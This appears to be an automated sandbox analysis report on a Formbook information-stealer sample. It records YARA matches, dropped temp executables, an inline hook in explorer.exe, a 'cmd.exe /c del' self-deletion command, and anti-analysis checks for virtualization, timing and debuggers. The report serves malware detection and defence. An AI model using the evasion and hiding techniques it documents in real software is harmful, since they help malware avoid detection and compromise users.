            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.739831969.0000000003EBC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: 00000000.00000002.739343756.0000000003D06000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe, type: DROPPED | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
            Source: New_1007572_021.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: New_1007572_021.exe.0.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: FB_5E87.tmp.exe.8.dr | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: FB_5E87.tmp.exe.8.dr | Static PE information: Section .text
            Source: classification engine | Classification label: mal100.troj.evad.winEXE@11/5@1/2
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | Code function: 8_2_00401000 FindResourceA,SizeofResource,LoadResource,LockResource,GetTempPathA,GetTempFileNameA,MoveFileExA,MoveFileExA,sprintf,CreateFileA,WriteFile,CloseHandle,ShellExecuteA,FreeResource,MoveFileExA,ExitProcess,
            Source: C:\Users\user\Desktop\New_1007572_021.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\New_1007572_021.exe.log
            Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6756:120:WilError_01
            Source: C:\Users\user\Desktop\New_1007572_021.exe | File created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
            Source: New_1007572_021.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | File read: C:\Users\user\Desktop\desktop.ini
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
            Source: New_1007572_021.exe | ReversingLabs: Detection: 28%
            Source: C:\Users\user\Desktop\New_1007572_021.exe | File read: C:\Users\user\Desktop\New_1007572_021.exe
            Source: unknown | Process created: C:\Users\user\Desktop\New_1007572_021.exe 'C:\Users\user\Desktop\New_1007572_021.exe'
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | Process created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | Process created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exe
            Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | Process created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | Process created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Windows\SysWOW64\cscript.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe'
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\New_1007572_021.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: New_1007572_021.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: New_1007572_021.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
            Source: Binary string: cscript.pdbUGP source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp
            Source: Binary string: wntdll.pdbUGP source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe, 00000013.00000002.925842696.000000000498F000.00000040.00000001.sdmp
            Source: Binary string: wntdll.pdb source: FB_5E87.tmp.exe, 0000000A.00000002.822175695.00000000013F0000.00000040.00000001.sdmp, cscript.exe
            Source: Binary string: cscript.pdb source: FB_5E87.tmp.exe, 0000000A.00000002.823189585.00000000032C0000.00000040.00000001.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 0000000B.00000000.765998733.0000000005A00000.00000002.00000001.sdmp

            Data Obfuscation:

            .NET source code contains potential unpacker
            Source: New_1007572_021.exe, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs | .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: New_1007572_021.exe.0.dr, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs | .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.2.New_1007572_021.exe.800000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs | .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 0.0.New_1007572_021.exe.800000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs | .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 8.0.New_1007572_021.exe.b50000.0.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs | .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: 8.2.New_1007572_021.exe.b50000.1.unpack, Cwzjibiwy.Expressions/SetterIdentifierExpression.cs | .Net Code: SelectInitializer System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
            Source: New_1007572_021.exe | Static PE information: 0xDF29736D [Sun Aug 22 17:54:53 2088 UTC]
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0109D12C push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_01097140 push edi; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0109D166 push dword ptr [CCC28DB9h]; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_01097814 push eax; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0109784D push eax; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0109D075 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0109D0CB push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0109D0C2 push eax; ret
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0108EDBC push edx; retf
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0109C443 push eax; iretd
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0109E4EE push ds; iretd
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0109D773 push dword ptr [CCC28DB9h]; ret
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048ED0D1 push ecx; ret
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031CD12C push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031C7140 push edi; retf
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031CD166 push dword ptr [CCC28DB9h]; ret
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031C7814 push eax; retf
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031C784D push eax; retf
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031CD075 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031CD0CB push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031CD0C2 push eax; ret
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031CD773 push dword ptr [CCC28DB9h]; ret
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031BEDBC push edx; retf
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031CC443 push eax; iretd
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_031CE4EE push ds; iretd
            Source: initial sample | Static PE information: section name: .text entropy: 7.98710710749
            Source: initial sample | Static PE information: section name: .text entropy: 7.98710710749
            Source: initial sample | Static PE information: section name: .text entropy: 7.40373413401
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | File created: C:\Users\user\AppData\Local\Temp\FB_5908.tmp.exe
            Source: C:\Users\user\Desktop\New_1007572_021.exe | File created: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | File created: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe

            Hooking and other Techniques for Hiding and Protection:

            Modifies the prolog of user mode functions (user mode inline hooks)
            Source: explorer.exe | User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xEF
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\New_1007572_021.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cscript.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\cmd.exe | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

            Tries to detect virtualization through RDTSC time measurements
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | RDTSC instruction interceptor: First address: 00000000010898E4 second address: 00000000010898EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | RDTSC instruction interceptor: First address: 0000000001089B4E second address: 0000000001089B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 00000000031B98E4 second address: 00000000031B98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Windows\SysWOW64\cscript.exe | RDTSC instruction interceptor: First address: 00000000031B9B4E second address: 00000000031B9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_01089A80 rdtsc
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\Desktop\New_1007572_021.exe TID: 6716 | Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Windows\explorer.exe | Last function: Thread delayed
            Source: C:\Windows\SysWOW64\cscript.exe | Last function: Thread delayed
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Thread delayed: delay time: 922337203685477
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: explorer.exe, 0000000B.00000000.771534648.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.767000909.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.771534648.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATAa
            Source: explorer.exe, 0000000B.00000000.760088803.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 0000000B.00000000.771670358.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
            Source: explorer.exe, 0000000B.00000000.798630799.00000000058C0000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: C:\Users\user\Desktop\New_1007572_021.exe | Process information queried: ProcessInformation
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\cscript.exe | Process queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_01089A80 rdtsc
            Source: C:\Users\user\AppData\Local\Temp\FB_5E87.tmp.exe | Code function: 10_2_0108ACC0 LdrLoadDll,
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A849B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04968CD6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916CF0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_049514FB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04951C06 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0496740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0496740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0496740D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916C0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048CBC2C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0492C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0492C450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048CA44B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048B746D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04892D8A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C2581 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048CFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048CFD9B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C35A1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C1DB5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_049605AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_049605AC mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916DC9 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04916DC9 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04948DF1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048AD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048AD5E0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0495FDE2 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_04968D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0491A537 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0495E539 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048C4D3B mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_0489AD30 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\cscript.exe | Code function: 19_2_048A3D34 mov eax, dword ptr fs:[00000030h]
